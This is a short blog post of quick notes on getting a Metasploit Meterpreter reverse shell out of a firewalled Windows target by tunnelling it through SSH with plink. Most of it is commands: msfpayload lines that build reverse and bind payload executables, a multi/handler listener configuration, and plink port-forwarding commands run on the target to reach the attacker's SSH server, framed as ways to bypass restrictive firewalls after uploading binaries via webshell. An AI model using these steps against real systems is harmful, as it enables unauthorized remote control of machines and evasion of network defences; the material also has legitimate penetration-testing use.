Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011 § Leave a comment

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you try to upload your meterpreter payload and runs it the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe
  1. Drop msf.exe on your target
  2. Drop plink.exe on your target (plink version from quest putty)
  3. Set up a msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j
  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connecting to the ssh server and setting up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444
  1. Start msf.exe

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Sessionhttp://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTYhttp://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:


##attacker##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ###

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:


##attacker###

msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

##target##

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444
About these ads

Tagged:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

What’s this?

You are currently reading Quick notes – Get a meterpreter reverse shell through SSH tunnel at hdesser.

meta

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: